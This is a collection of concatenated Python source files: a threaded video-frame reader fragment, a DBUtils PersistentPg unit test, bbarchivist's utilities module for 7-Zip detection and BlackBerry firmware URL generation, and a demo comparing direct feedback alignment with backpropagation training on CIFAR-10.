raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame)
self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3))
self.grabbed = self.frame is not None
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
# if the thread indicator variable is set, stop the thread
while True:
if self.stopped:
return
raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame)
self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3))
self.grabbed = self.frame is not None
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
TestPersistentPg.py
|
"""Test the PersistentPg module.
Note:
We don't test performance here, so the test does not predicate
whether PersistentPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import sys
import unittest
# The TestSteadyPg module serves as a mock object for the pg API module:
sys.path.insert(1, '../..')
from DBUtils.Tests import TestSteadyPg as pg
from DBUtils.PersistentPg import PersistentPg
__version__ = '1.2'
class TestPersistentPg(unittest.TestCase):
def test0_CheckVersion(self):
from DBUtils import __version__ as DBUtilsVersion
self.assertEqual(DBUtilsVersion, __version__)
from DBUtils.PersistentPg import __version__ as PersistentPgVersion
self.assertEqual(PersistentPgVersion, __version__)
self.assertEqual(PersistentPg.version, __version__)
def test1_Close(self):
for closeable in (False, True):
persist = PersistentPg(closeable=closeable)
db = persist.connection()
self.assertTrue(db._con.db and db._con.valid)
db.close()
self.assertTrue(closeable ^
(db._con.db is not None and db._con.valid))
db.close()
self.assertTrue(closeable ^
(db._con.db is not None and db._con.valid))
db._close()
self.assertTrue(not db._con.db or not db._con.valid)
db._close()
self.assertTrue(not db._con.db or not db._con.valid)
def test2_Threads(self):
numThreads = 3
persist = PersistentPg()
try:
from Queue import Queue, Empty
except ImportError: # Python 3
from queue import Queue, Empty
queryQueue, resultQueue = [], []
for i in range(numThreads):
queryQueue.append(Queue(1))
resultQueue.append(Queue(1))
def runQueries(i):
this_db = persist.connection().db
while 1:
try:
try:
q = queryQueue[i].get(1, 1)
except TypeError:
q = queryQueue[i].get(1)
except Empty:
q = None
if not q:
break
db = persist.connection()
if db.db != this_db:
r = 'error - not persistent'
else:
if q == 'ping':
r = 'ok - thread alive'
elif q == 'close':
db.db.close()
r = 'ok - connection closed'
else:
r = db.query(q)
r = '%d(%d): %s' % (i, db._usage, r)
try:
resultQueue[i].put(r, 1, 1)
except TypeError:
resultQueue[i].put(r, 1)
db.close()
from threading import Thread
threads = []
for i in range(numThreads):
thread = Thread(target=runQueries, args=(i,))
threads.append(thread)
thread.start()
for i in range(numThreads):
try:
queryQueue[i].put('ping', 1, 1)
except TypeError:
queryQueue[i].put('ping', 1)
for i in range(numThreads):
try:
r = resultQueue[i].get(1, 1)
except TypeError:
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(0): ok - thread alive' % i)
self.assertTrue(threads[i].isAlive())
for i in range(numThreads):
for j in range(i + 1):
try:
queryQueue[i].put('select test%d' % j, 1, 1)
r = resultQueue[i].get(1, 1)
except TypeError:
queryQueue[i].put('select test%d' % j, 1)
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(%d): test%d' % (i, j + 1, j))
try:
queryQueue[1].put('select test4', 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('select test4', 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(3): test4')
try:
queryQueue[1].put('close', 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('close', 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(3): ok - connection closed')
for j in range(2):
try:
queryQueue[1].put('select test%d' % j, 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('select test%d' % j, 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(%d): test%d' % (j + 1, j))
for i in range(numThreads):
self.assertTrue(threads[i].isAlive())
try:
queryQueue[i].put('ping', 1, 1)
except TypeError:
queryQueue[i].put('ping', 1)
for i in range(numThreads):
try:
r = resultQueue[i].get(1, 1)
except TypeError:
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(%d): ok - thread alive' % (i, i + 1))
self.assertTrue(threads[i].isAlive())
for i in range(numThreads):
try:
queryQueue[i].put(None, 1, 1)
except TypeError:
queryQueue[i].put(None, 1)
def test3_MaxUsage(self):
persist = PersistentPg(20)
db = persist.connection()
self.assertEqual(db._maxusage, 20)
for i in range(100):
r = db.query('select test%d' % i)
self.assertEqual(r, 'test%d' % i)
self.assertTrue(db.db.status)
j = i % 20 + 1
self.assertEqual(db._usage, j)
self.assertEqual(db.num_queries, j)
def test4_SetSession(self):
persist = PersistentPg(3, ('set datestyle',))
db = persist.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
self.assertEqual(db.db.session, ['datestyle'])
db.query('set test')
for i in range(3):
self.assertEqual(db.db.session, ['datestyle', 'test'])
db.query('select test')
self.assertEqual(db.db.session, ['datestyle'])
def test5_FailedTransaction(self):
persist = PersistentPg()
db = persist.connection()
db._con.close()
self.assertEqual(db.query('select test'), 'test')
db.begin()
db._con.close()
self.assertRaises(pg.InternalError, db.query, 'select test')
self.assertEqual(db.query('select test'), 'test')
db.begin()
self.assertEqual(db.query('select test'), 'test')
db.rollback()
db._con.close()
self.assertEqual(db.query('select test'), 'test')
if __name__ == '__main__':
unittest.main()
|
utilities.py
|
#!/usr/bin/env python3
"""This module is used for miscellaneous utilities."""
import glob # cap grabbing
import hashlib # base url creation
import itertools # spinners gonna spin
import os # path work
import platform # platform info
import subprocess # loader verification
import sys # streams, version info
import threading # get thread for spinner
import time # spinner delay
from bbarchivist import bbconstants # cap location, version, filename bits
from bbarchivist import compat # backwards compat
from bbarchivist import dummy # useless stdout
from bbarchivist import exceptions # exceptions
from bbarchivist import iniconfig # config parsing
__author__ = "Thurask"
__license__ = "WTFPL v2"
__copyright__ = "2015-2019 Thurask"
def grab_datafile(datafile):
"""
Figure out where a datafile is.
:param datafile: Datafile to check.
:type datafile: bbconstants.Datafile
"""
try:
afile = glob.glob(os.path.join(os.getcwd(), datafile.filename))[0]
except IndexError:
afile = datafile.location if datafile.name == "cfp" else grab_capini(datafile)
return os.path.abspath(afile)
def grab_capini(datafile):
"""
Get cap location from .ini file, and write if it's new.
:param datafile: Datafile to check.
:type datafile: bbconstants.Datafile
"""
try:
apath = cappath_config_loader()
afile = glob.glob(apath)[0]
except IndexError:
cappath_config_writer(datafile.location)
return bbconstants.CAP.location # no ini cap
else:
cappath_config_writer(os.path.abspath(afile))
return os.path.abspath(afile) # ini cap
def grab_cap():
"""
Figure out where cap is, local, specified or system-supplied.
"""
return grab_datafile(bbconstants.CAP)
def grab_cfp():
"""
Figure out where cfp is, local or system-supplied.
"""
return grab_datafile(bbconstants.CFP)
def new_enough(majver, minver):
"""
Check if we're at or above a minimum Python version.
:param majver: Minimum major Python version (majver.minver).
:type majver: int
:param minver: Minimum minor Python version (majver.minver).
:type minver: int
"""
if majver > sys.version_info[0]:
sentinel = False
elif majver == sys.version_info[0] and minver > sys.version_info[1]:
sentinel = False
else:
sentinel = True
return sentinel
def dirhandler(directory, defaultdir):
"""
If directory is None, turn it into defaultdir.
:param directory: Target directory.
:type directory: str
:param defaultdir: Default directory.
:type defaultdir: str
"""
directory = defaultdir if directory is None else directory
return directory
def fsizer(file_size):
"""
Raw byte file size to human-readable string.
:param file_size: Number to parse.
:type file_size: float
"""
fsize = prep_filesize(file_size)
for sfix in ['B', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB']:
if fsize < 1024.0:
size = "{0:3.2f}{1}".format(fsize, sfix)
break
else:
fsize /= 1024.0
else:
size = "{0:3.2f}{1}".format(fsize, 'YB')
return size
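# Examples (editor's note): 1536 bytes is divided once by 1024 and labelled 'kB';
# None is treated as 0.0 by prep_filesize.
#   fsizer(1536) -> "1.50kB"
#   fsizer(None) -> "0.00B"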
def prep_filesize(file_size):
"""
Convert file size to float.
:param file_size: Number to parse.
:type file_size: float
"""
if file_size is None:
file_size = 0.0
fsize = float(file_size)
return fsize
def s2b(input_check):
"""
Return Boolean interpretation of string input.
:param input_check: String to check if it means True or False.
:type input_check: str
"""
return str(input_check).lower() in ("yes", "true", "t", "1", "y")
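# Examples (editor's note): any of "yes", "true", "t", "1", "y" (case-insensitive) is True.
#   s2b("Yes") -> True
#   s2b("0")   -> False
#   s2b(1)     -> True   (str(1).lower() == "1")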
def i2b(input_check):
"""
Return Boolean interpretation of typed input.
:param input_check: Query to feed into input function.
:type input_check: str
"""
return s2b(input(input_check))
def is_amd64():
"""
Check if script is running on an AMD64 system (Python can be 32/64, this is for subprocess)
"""
return platform.machine().endswith("64")
def is_windows():
"""
Check if script is running on Windows.
"""
return platform.system() == "Windows"
def talkaprint(msg, talkative=False):
"""
Print only if asked to.
:param msg: Message to print.
:type msg: str
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
if talkative:
print(msg)
def get_seven_zip(talkative=False):
"""
Return name of 7-Zip executable.
On POSIX, it MUST be 7za.
On Windows, it can be installed or supplied with the script.
:func:`win_seven_zip` is used to determine if it's installed.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
return win_seven_zip(talkative) if is_windows() else "7za"
def win_seven_zip(talkative=False):
"""
For Windows, check where 7-Zip is ("where", pretty much).
Consult registry first for any installed instances of 7-Zip.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
talkaprint("CHECKING INSTALLED FILES...", talkative)
try:
path = wsz_registry()
except OSError as exc:
if talkative:
exceptions.handle_exception(exc, xit=None)
talkaprint("TRYING LOCAL FILES...", talkative)
return win_seven_zip_local(talkative)
else:
talkaprint("7ZIP USING INSTALLED FILES", talkative)
return '"{0}"'.format(os.path.join(path[0], "7z.exe"))
def wsz_registry():
"""
Check Windows registry for 7-Zip executable location.
"""
import winreg # windows registry
hk7z = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\7-Zip")
path = winreg.QueryValueEx(hk7z, "Path")
return path
def win_seven_zip_local(talkative=False):
"""
If 7-Zip isn't in the registry, fall back onto supplied executables.
If *those* aren't there, return "error".
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
filecount = wsz_filecount()
if filecount == 2:
szexe = wsz_local_good(talkative)
else:
szexe = wsz_local_bad(talkative)
return szexe
def wsz_filecount():
"""
Get count of 7-Zip executables in local folder.
"""
filecount = len([x for x in os.listdir(os.getcwd()) if x in ["7za.exe", "7za64.exe"]])
return filecount
def wsz_local_good(talkative=False):
"""
Get 7-Zip exe name if everything is good.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
talkaprint("7ZIP USING LOCAL FILES", talkative)
szexe = "7za64.exe" if is_amd64() else "7za.exe"
return szexe
def wsz_local_bad(talkative=False):
"""
Handle 7-Zip exe name in case of issues.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
talkaprint("NO LOCAL FILES", talkative)
szexe = "error"
return szexe
def get_core_count():
"""
Find out how many CPU cores this system has.
"""
try:
cores = str(compat.enum_cpus()) # 3.4 and up
except NotImplementedError:
cores = "1" # 3.2-3.3
else:
if compat.enum_cpus() is None:
cores = "1"
return cores
def prep_seven_zip_path(path, talkative=False):
"""
Print p7zip path on POSIX, or notify if not there.
:param path: Path to use.
:type path: str
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
if path is None:
talkaprint("NO 7ZIP\nPLEASE INSTALL p7zip", talkative)
sentinel = False
else:
talkaprint("7ZIP FOUND AT {0}".format(path), talkative)
sentinel = True
return sentinel
def prep_seven_zip_posix(talkative=False):
"""
Check for p7zip on POSIX.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
try:
path = compat.where_which("7za")
except ImportError:
talkaprint("PLEASE INSTALL SHUTILWHICH WITH PIP", talkative)
return False
else:
return prep_seven_zip_path(path, talkative)
def prep_seven_zip(talkative=False):
"""
Check for presence of 7-Zip.
On POSIX, check for p7zip.
On Windows, check for 7-Zip.
:param talkative: Whether to output to screen. False by default.
:type talkative: bool
"""
if is_windows():
final = get_seven_zip(talkative) != "error"
else:
final = prep_seven_zip_posix(talkative)
return final
def increment(version, inc=3):
"""
Increment version by given number. For repeated lookups.
:param version: w.x.y.ZZZZ, becomes w.x.y.(ZZZZ + increment).
:type version: str
:param inc: What to increment by. Default is 3.
:type inc: str
"""
splitos = version.split(".")
splitos[3] = int(splitos[3])
if splitos[3] > 9996: # prevent overflow
splitos[3] = 0
splitos[3] += int(inc)
splitos[3] = str(splitos[3])
return ".".join(splitos)
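# Examples (editor's note): only the fourth (build) field changes; values past 9996
# are reset to 0 before adding, to prevent overflow.
#   increment("10.3.2.2876")    -> "10.3.2.2879"
#   increment("10.3.2.9998", 3) -> "10.3.2.3"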
def stripper(name):
"""
Strip fluff from bar filename.
:param name: Bar filename, must contain '-nto+armle-v7+signed.bar'.
:type name: str
"""
return name.replace("-nto+armle-v7+signed.bar", "")
def create_base_url(softwareversion):
"""
Make the root URL for production server files.
:param softwareversion: Software version to hash.
:type softwareversion: str
"""
# Hash software version
swhash = hashlib.sha1(softwareversion.encode('utf-8'))
hashedsoftwareversion = swhash.hexdigest()
# Root of all urls
baseurl = "http://cdn.fs.sl.blackberry.com/fs/qnx/production/{0}".format(hashedsoftwareversion)
return baseurl
def format_app_name(appname):
"""
Convert long reverse DNS name to short name.
:param appname: Application name (ex. sys.pim.calendar -> "calendar")
:type appname: str
"""
final = appname.split(".")[-1]
return final
def create_bar_url(softwareversion, appname, appversion, clean=False):
"""
Make the URL for any production server file.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param appname: Application name, preferably like on server.
:type appname: str
:param appversion: Application version.
:type appversion: str
:param clean: Whether or not to clean up app name. Default is False.
:type clean: bool
"""
baseurl = create_base_url(softwareversion)
if clean:
appname = format_app_name(appname)
return "{0}/{1}-{2}-nto+armle-v7+signed.bar".format(baseurl, appname, appversion)
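# Example (editor's note): the file name part is fully determined by the app name and
# version; the prefix comes from create_base_url (SHA-1 hash of the software release),
# shown here as a placeholder rather than a real digest.
#   create_bar_url("10.3.3.2205", "sys.pim.calendar", "10.3.3.100", clean=True)
#   -> "http://cdn.fs.sl.blackberry.com/fs/qnx/production/<sha1>/calendar-10.3.3.100-nto+armle-v7+signed.bar"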
def generate_urls(softwareversion, osversion, radioversion, core=False):
"""
Generate a list of OS URLs and a list of radio URLs based on input.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param osversion: OS version.
:type osversion: str
:param radioversion: Radio version.
:type radioversion: str
:param core: Whether or not to return core URLs as well.
:type core: bool
"""
osurls = [
create_bar_url(softwareversion, "winchester.factory_sfi.desktop", osversion),
create_bar_url(softwareversion, "qc8960.factory_sfi.desktop", osversion),
create_bar_url(softwareversion, "qc8960.factory_sfi.desktop", osversion),
create_bar_url(softwareversion, "qc8974.factory_sfi.desktop", osversion)
]
radiourls = [
create_bar_url(softwareversion, "m5730", radioversion),
create_bar_url(softwareversion, "qc8960", radioversion),
create_bar_url(softwareversion, "qc8960.omadm", radioversion),
create_bar_url(softwareversion, "qc8960.wtr", radioversion),
create_bar_url(softwareversion, "qc8960.wtr5", radioversion),
create_bar_url(softwareversion, "qc8930.wtr5", radioversion),
create_bar_url(softwareversion, "qc8974.wtr2", radioversion)
]
coreurls = []
osurls, radiourls = filter_urls(osurls, radiourls, osversion)
if core:
coreurls = [x.replace(".desktop", "") for x in osurls]
return osurls, radiourls, coreurls
def newer_103(splitos, third):
"""
Return True if given split OS version is 10.3.X or newer.
:param splitos: OS version, split on the dots: [10, 3, 3, 2205]
:type: list(int)
:param third: The X in 10.3.X.
:type third: int
"""
newer = True if ((splitos[1] >= 4) or (splitos[1] == 3 and splitos[2] >= third)) else False
return newer
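# Examples (editor's note): True for 10.4+ or for 10.3.X with X >= third.
#   newer_103([10, 3, 3, 2205], 3) -> True
#   newer_103([10, 3, 2, 2876], 3) -> False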
def filter_urls(osurls, radiourls, osversion):
"""
Filter lists of OS and radio URLs.
:param osurls: List of OS URLs.
:type osurls: list(str)
:param radiourls: List of radio URLs.
:type radiourls: list(str)
:param osversion: OS version.
:type osversion: str
"""
splitos = [int(i) for i in osversion.split(".")]
osurls[2] = filter_1031(osurls[2], splitos, 5) # Z3 10.3.1+
osurls[3] = filter_1031(osurls[3], splitos, 6) # Passport 10.3.1+
osurls, radiourls = pop_stl1(osurls, radiourls, splitos) # STL100-1 10.3.3+
return osurls, radiourls
def filter_1031(osurl, splitos, device):
"""
Modify URLs to reflect changes in 10.3.1.
:param osurl: OS URL to modify.
:type osurl: str
:param splitos: OS version, split and cast to int: [10, 3, 2, 2876]
:type splitos: list(int)
:param device: Device to use.
:type device: int
"""
if newer_103(splitos, 1):
filterdict = {5: ("qc8960.factory_sfi", "qc8960.factory_sfi_hybrid_qc8x30"), 6: ("qc8974.factory_sfi", "qc8960.factory_sfi_hybrid_qc8974")}
osurl = filter_osversion(osurl, device, filterdict)
return osurl
def pop_stl1(osurls, radiourls, splitos):
"""
Replace STL100-1 links in 10.3.3+.
:param osurls: List of OS platforms.
:type osurls: list(str)
:param radiourls: List of radio platforms.
:type radiourls: list(str)
:param splitos: OS version, split and cast to int: [10, 3, 3, 2205]
:type splitos: list(int)
"""
if newer_103(splitos, 3):
osurls = osurls[1:]
radiourls = radiourls[1:]
return osurls, radiourls
def filter_osversion(osurl, device, filterdict):
"""
Modify URLs based on device index and dictionary of changes.
:param osurl: OS URL to modify.
:type osurl: str
:param device: Device to use.
:type device: int
:param filterdict: Dictionary of changes: {device : (before, after)}
:type filterdict: dict(int:(str, str))
"""
if device in filterdict.keys():
osurl = osurl.replace(filterdict[device][0], filterdict[device][1])
return osurl
def generate_lazy_urls(softwareversion, osversion, radioversion, device):
"""
Generate a pair of OS/radio URLs based on input.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param osversion: OS version.
:type osversion: str
:param radioversion: Radio version.
:type radioversion: str
:param device: Device to use.
:type device: int
"""
splitos = [int(i) for i in osversion.split(".")]
rads = ["m5730", "qc8960", "qc8960.omadm", "qc8960.wtr",
"qc8960.wtr5", "qc8930.wtr4", "qc8974.wtr2"]
oses = ["winchester.factory", "qc8960.factory", "qc8960.verizon",
"qc8974.factory"]
maps = {0:0, 1:1, 2:2, 3:1, 4:1, 5:1, 6:3}
osurl = create_bar_url(softwareversion, "{0}_sfi.desktop".format(oses[maps[device]]), osversion)
radiourl = create_bar_url(softwareversion, rads[device], radioversion)
osurl = filter_1031(osurl, splitos, device)
return osurl, radiourl
def bulk_urls(softwareversion, osversion, radioversion, core=False, altsw=None):
"""
Generate all URLs, plus extra Verizon URLs.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param osversion: OS version.
:type osversion: str
:param radioversion: Radio version.
:type radioversion: str
:param core: Whether or not to return core URLs as well.
:type core: bool
:param altsw: Radio software release, if not the same as OS.
:type altsw: str
"""
baseurl = create_base_url(softwareversion)
osurls, radurls, coreurls = generate_urls(softwareversion, osversion, radioversion, core)
vzwos, vzwrad = generate_lazy_urls(softwareversion, osversion, radioversion, 2)
osurls.append(vzwos)
radurls.append(vzwrad)
vzwcore = vzwos.replace("sfi.desktop", "sfi")
if core:
coreurls.append(vzwcore)
osurls = list(set(osurls)) # pop duplicates
radurls = list(set(radurls))
if core:
coreurls = list(set(coreurls))
radurls = bulk_urls_altsw(radurls, baseurl, altsw)
return osurls, coreurls, radurls
def bulk_urls_altsw(radurls, baseurl, altsw=None):
"""
Handle alternate software release for radio.
:param radurls: List of radio URLs.
:type radurls: list(str)
:param baseurl: Base URL (from http to hashed SW release).
:type baseurl: str
:param altsw: Radio software release, if not the same as OS.
:type altsw: str
"""
if altsw is not None:
altbase = create_base_url(altsw)
radiourls2 = [rad.replace(baseurl, altbase) for rad in radurls]
radurls = radiourls2
del radiourls2
return radurls
def line_begin():
"""
Go to beginning of line, to overwrite whatever's there.
"""
sys.stdout.write("\r")
sys.stdout.flush()
def spinner_clear():
"""
Get rid of any spinner residue left in stdout.
"""
sys.stdout.write("\b \b")
sys.stdout.flush()
class Spinner(object):
"""
A basic spinner using itertools. No need for progress.
"""
def __init__(self):
"""
Generate the itertools wheel.
"""
self.wheel = itertools.cycle(['-', '/', '|', '\\'])
self.file = dummy.UselessStdout()
def after(self):
"""
Iterate over itertools.cycle, write to file.
"""
try:
self.file.write(next(self.wheel))
self.file.flush()
self.file.write("\b\r")
self.file.flush()
except (KeyboardInterrupt, SystemExit):
self.stop()
def stop(self):
"""
Kill output.
"""
self.file = dummy.UselessStdout()
class SpinManager(object):
"""
Wraps around the itertools spinner, runs it in another thread.
"""
def __init__(self):
"""
Start the spinner thread.
"""
spinner = Spinner()
self.spinner = spinner
self.thread = threading.Thread(target=self.loop, args=())
self.thread.daemon = True
self.scanning = False
self.spinner.file = dummy.UselessStdout()
def start(self):
"""
Begin the spinner.
"""
self.spinner.file = sys.stderr
self.scanning = True
self.thread.start()
def loop(self):
"""
Spin if scanning, clean up if not.
"""
while self.scanning:
time.sleep(0.5)
try:
line_begin()
self.spinner.after()
except (KeyboardInterrupt, SystemExit):
self.scanning = False
self.stop()
def stop(self):
"""
Stop the spinner.
"""
self.spinner.stop()
self.scanning = False
spinner_clear()
line_begin()
if not is_windows():
print("\n")
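# Illustrative usage (editor's sketch): wrap a long-running call with the spinner thread.
#   spinner = SpinManager()
#   spinner.start()
#   do_long_running_work()   # placeholder for the wrapped call
#   spinner.stop()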
def return_and_delete(target):
"""
Read text file, then delete it. Return contents.
:param target: Text file to read.
:type target: str
"""
with open(target, "r") as thefile:
content = thefile.read()
os.remove(target)
return content
def verify_loader_integrity(loaderfile):
"""
Test for created loader integrity. Windows-only.
:param loaderfile: Path to loader.
:type loaderfile: str
"""
if not is_windows():
pass
else:
excode = None
try:
with open(os.devnull, 'rb') as dnull:
cmd = "{0} fileinfo".format(loaderfile)
excode = subprocess.call(cmd, stdout=dnull, stderr=subprocess.STDOUT)
except OSError:
excode = -1
return excode == 0 # 0 if OK, non-zero if something broke
def bulkfilter_printer(afile):
"""
Print filename and verify a loader file.
:param afile: Path to file.
:type afile: str
"""
print("TESTING: {0}".format(os.path.basename(afile)))
if not verify_loader_integrity(afile):
return os.path.basename(afile)
def bulkfilter(files):
"""
Verify all loader files in a given list.
:param files: List of files.
:type files: list(str)
"""
brokens = [bulkfilter_printer(file) for file in files if prepends(os.path.basename(file), bbconstants.PREFIXES, ".exe")]
return brokens
def verify_bulk_loaders(ldir):
"""
Run :func:`verify_loader_integrity` for all files in a dir.
:param ldir: Directory to use.
:type ldir: str
"""
if not is_windows():
pass
else:
files = verify_bulk_loaders_filefilter(ldir)
brokens = verify_bulk_loaders_brokens(files)
return brokens
def verify_bulk_loaders_filefilter(ldir):
"""
Prepare file names for :func:`verify_bulk_loaders`.
:param ldir: Directory to use.
:type ldir: str
"""
    files = [os.path.join(ldir, file) for file in os.listdir(ldir) if not os.path.isdir(os.path.join(ldir, file))]
return files
def verify_bulk_loaders_brokens(files):
"""
Prepare filtered file list for :func:`verify_bulk_loaders`.
:param files: List of files.
:type files: list(str)
"""
brokens = [file for file in bulkfilter(files) if file]
return brokens
def list_workers(input_data, workerlimit):
"""
Count number of threads, either length of iterable or provided limit.
:param input_data: Input data, some iterable.
:type input_data: list
:param workerlimit: Maximum number of workers.
:type workerlimit: int
"""
runners = len(input_data) if len(input_data) < workerlimit else workerlimit
return runners
def cpu_workers(input_data):
"""
Count number of CPU workers, smaller of number of threads and length of data.
:param input_data: Input data, some iterable.
:type input_data: list
"""
return list_workers(input_data, compat.enum_cpus())
def prep_logfile():
"""
Prepare log file, labeling it with current date. Select folder based on frozen status.
"""
logfile = "{0}.txt".format(time.strftime("%Y_%m_%d_%H%M%S"))
basefolder = prep_logfile_folder()
record = os.path.join(basefolder, logfile)
open(record, "w").close()
return record
def prep_logfile_folder():
"""
Prepare folder to write log file to.
"""
if getattr(sys, 'frozen', False):
basefolder = os.path.join(os.getcwd(), "lookuplogs")
os.makedirs(basefolder, exist_ok=True)
else:
basefolder = iniconfig.config_homepath(None, True)
return basefolder
def prepends(file, pre, suf):
"""
Check if filename starts with/ends with stuff.
:param file: File to check.
:type file: str
:param pre: Prefix(es) to check.
:type pre: str or list or tuple
:param suf: Suffix(es) to check.
:type suf: str or list or tuple
"""
return file.startswith(pre) and file.endswith(suf)
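# Examples (editor's note): both prefix and suffix must match; a tuple may be passed
# to check several prefixes at once.
#   prepends("Z10loader.exe", ("Z10", "Z30"), ".exe") -> True
#   prepends("Z10loader.exe", "Q10", ".exe")          -> False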
def lprint(iterable):
"""
A oneliner for 'for item in x: print item'.
:param iterable: Iterable to print.
:type iterable: list/tuple
"""
for item in iterable:
print(item)
def cappath_config_loader(homepath=None):
"""
Read a ConfigParser file to get cap preferences.
:param homepath: Folder containing ini file. Default is user directory.
:type homepath: str
"""
capini = iniconfig.generic_loader('cappath', homepath)
cappath = capini.get('path', fallback=bbconstants.CAP.location)
return cappath
def cappath_config_writer(cappath=None, homepath=None):
"""
Write a ConfigParser file to store cap preferences.
:param cappath: Method to use.
:type cappath: str
:param homepath: Folder containing ini file. Default is user directory.
:type homepath: str
"""
cappath = grab_cap() if cappath is None else cappath
results = {"path": cappath}
iniconfig.generic_writer("cappath", results, homepath)
def one_and_none(first, second):
"""
Check if one element in a pair is None and one isn't.
:param first: To return True, this must be None.
:type first: str
    :param second: To return True, this must not be None.
:type second: str
"""
    sentinel = first is None and second is not None
return sentinel
def def_args(dirs):
"""
    Return prepared argument list for most instances of :func:`cond_check`.
:param dirs: List of directories.
:type dirs: list(str)
"""
return [dirs[4], dirs[5], dirs[2], dirs[3]]
def cond_do(dofunc, goargs, restargs=None, condition=True):
"""
Do a function, check a condition, then do same function but swap first argument.
:param dofunc: Function to do.
:type dofunc: function
:param goargs: List of variable arguments.
:type goargs: list(str)
:param restargs: Rest of arguments, which are constant.
:type restargs: list(str)
:param condition: Condition to check in order to use secondarg.
:type condition: bool
"""
restargs = [] if restargs is None else restargs
dofunc(goargs[0], *restargs)
if condition:
dofunc(goargs[1], *restargs)
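# Example (editor's note): the same function runs on goargs[0], then on goargs[1] when
# the condition holds, with restargs appended each time.
#   cond_do(print, ["first", "second"], ["suffix"])  # prints "first suffix", then "second suffix"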
def cond_check(dofunc, goargs, restargs=None, condition=True, checkif=True, checkifnot=True):
"""
Do :func:`cond_do` based on a condition, then do it again based on a second condition.
:param dofunc: Function to do.
:type dofunc: function
:param goargs: List of variable arguments.
:type goargs: list(str)
:param restargs: Rest of arguments, which are constant.
:type restargs: list(str)
:param condition: Condition to check in order to use secondarg.
:type condition: bool
:param checkif: Do :func:`cond_do` if this is True.
:type checkif: bool
:param checkifnot: Do :func:`cond_do` if this is False.
:type checkifnot: bool
"""
if checkif:
cond_do(dofunc, goargs[0:2], restargs, condition)
if not checkifnot:
cond_do(dofunc, goargs[2:4], restargs, condition)
|
04_demo_newtork.py
|
from multiprocessing import freeze_support
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
import scipy.interpolate
import scipy.ndimage.filters
import threading
import dataset.cifar10_dataset
from network import activation
from network.layers.conv_to_fully_connected import ConvToFullyConnected
from network.layers.fully_connected import FullyConnected
from network.model import Model
from network.optimizer import GDMomentumOptimizer
if __name__ == '__main__':
"""
Goal: Compare DFA and BP training performances with respect to validation/test loss, validation/test accuracy and
training time on a fully connected NN
Initial learning rate, regularization and learning rate decay parameters were evaluated
by hand by comparing the training performance on the validation set for various
parameter combinations
"""
freeze_support()
num_iteration = 10
data = dataset.cifar10_dataset.load()
""" DFA Model definition """
layers_dfa = [
ConvToFullyConnected(),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=10, activation=None, last_layer=True)
]
model_dfa = Model(
layers=layers_dfa,
num_classes=10,
optimizer=GDMomentumOptimizer(lr=3*1e-3, mu=0.9),
regularization=0.09,
lr_decay=0.5,
lr_decay_interval=3
)
""" BP Model definition """
layers_bp = [
ConvToFullyConnected(),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=10, activation=None, last_layer=True)
]
model_bp = Model(
layers=layers_bp,
num_classes=10,
optimizer=GDMomentumOptimizer(lr=1e-2, mu=0.9),
regularization=0.01,
lr_decay=0.5,
lr_decay_interval=3
)
print("\nRun training:\n------------------------------------")
class Trainer(object):
def __init__(self, model, method) -> None:
super().__init__()
self.model = model
self.method = method
def __call__(self):
self.model.train(data_set=data, method=self.method, num_passes=num_iteration, batch_size=64)
# stats_dfa = model_dfa.train(data_set=data, method='dfa', num_passes=num_iteration, batch_size=64)
# stats_bp = model_bp.train(data_set=data, method='bp', num_passes=num_iteration, batch_size=64)
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
def animate(i):
ax1.clear()
ax1.plot(np.arange(len(model_dfa.statistics['train_loss'])), model_dfa.statistics['train_loss'])
ax1.plot(np.arange(len(model_bp.statistics['train_loss'])), model_bp.statistics['train_loss'])
dfa_train_thread = threading.Thread(target=Trainer(model_dfa, 'dfa'))
bp_train_thread = threading.Thread(target=Trainer(model_bp, 'bp'))
dfa_train_thread.start()
bp_train_thread.start()
